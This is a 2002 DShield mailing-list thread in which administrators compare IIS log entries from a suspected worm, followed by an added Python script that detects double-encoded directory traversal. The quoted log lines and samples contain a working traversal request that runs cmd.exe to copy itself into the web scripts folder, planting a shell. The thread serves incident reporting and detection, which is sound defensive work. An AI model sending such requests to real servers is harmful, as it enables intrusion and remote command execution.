[Dshield] Re: New IIS directory traversal worm, or just a tool sig?

Tim Rushing dshield at threenorth.com
Wed Nov 6 19:06:26 GMT 2002


All of mine are of the format that Mr. Simpson indicates.

24.174.135.49 - - [29/Oct/2002:15:06:19 -0600]
142.163.201.241 - - [02/Nov/2002:05:51:27 -0600]
216.202.108.210 - - [02/Nov/2002:05:57:46 -0600]
216.78.58.230 - - [03/Nov/2002:03:45:29 -0600]
65.68.208.57 - - [03/Nov/2002:04:00:38 -0600]
66.28.241.10 - - [03/Nov/2002:12:59:06 -0600]
148.223.133.195 - - [04/Nov/2002:18:47:30 -0600]



At 09:16 AM 11/5/02 -0600, Preston G. Simpson wrote:
>James C Slora wrote:
>
> > http://ww.tk.gov/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+
> > copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\scripts.exe
> >
> > Anyone else seen this?
>
>         I've seen something similar:
>
>206.203.46.237 - GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/
>c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe
>
>         I got the first one of these (all from different addresses)
>on or about 30 October. I've seen 13 to date, outnumbering the more
>usual garden variety directory traversals I've seen.
>
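
A detection check for the request format quoted in this thread, added here as an example (not code from the list or from any poster): it percent-decodes the request path repeatedly and reports traversal sequences, noting how many decoding passes were needed to expose them. The log layout, client addresses, verdict labels and function names are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (documentation-range client addresses); the
# first request repeats the one quoted in the thread.
SAMPLE_LOG = [
    r"192.0.2.10 - GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\script.exe",
    "192.0.2.11 - GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir",
    "192.0.2.12 - GET /images/logo%2520small.gif",
    "192.0.2.13 - GET /default.htm",
]

LINE_RE = re.compile(r"^(?P<src>\S+) - (?P<method>[A-Z]+) (?P<uri>\S+)$")
# A ".." path segment delimited by either slash or backslash.
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
MAX_ROUNDS = 5  # upper bound on decoding passes


def decode_fully(path):
    """Percent-decode until the value stops changing; return (path, passes)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds


def classify(line):
    """Return (source, verdict) for one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path = m.group("uri").split("?", 1)[0]  # inspect the path, not the query
    decoded, rounds = decode_fully(path)
    if not TRAVERSAL_RE.search(decoded):
        return m.group("src"), "clean"
    labels = {0: "traversal", 1: "encoded-traversal"}
    return m.group("src"), labels.get(rounds, "double-encoded-traversal")


def scan(lines):
    """Return only the parsed lines whose verdict is not 'clean'."""
    results = [classify(line) for line in lines]
    return [r for r in results if r and r[1] != "clean"]


if __name__ == "__main__":
    for src, verdict in scan(SAMPLE_LOG):
        print(src, verdict)
```

The third sample line is double-encoded but contains no traversal, so it is reported as clean: the verdict depends on what the path decodes to, not on the presence of `%25`.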



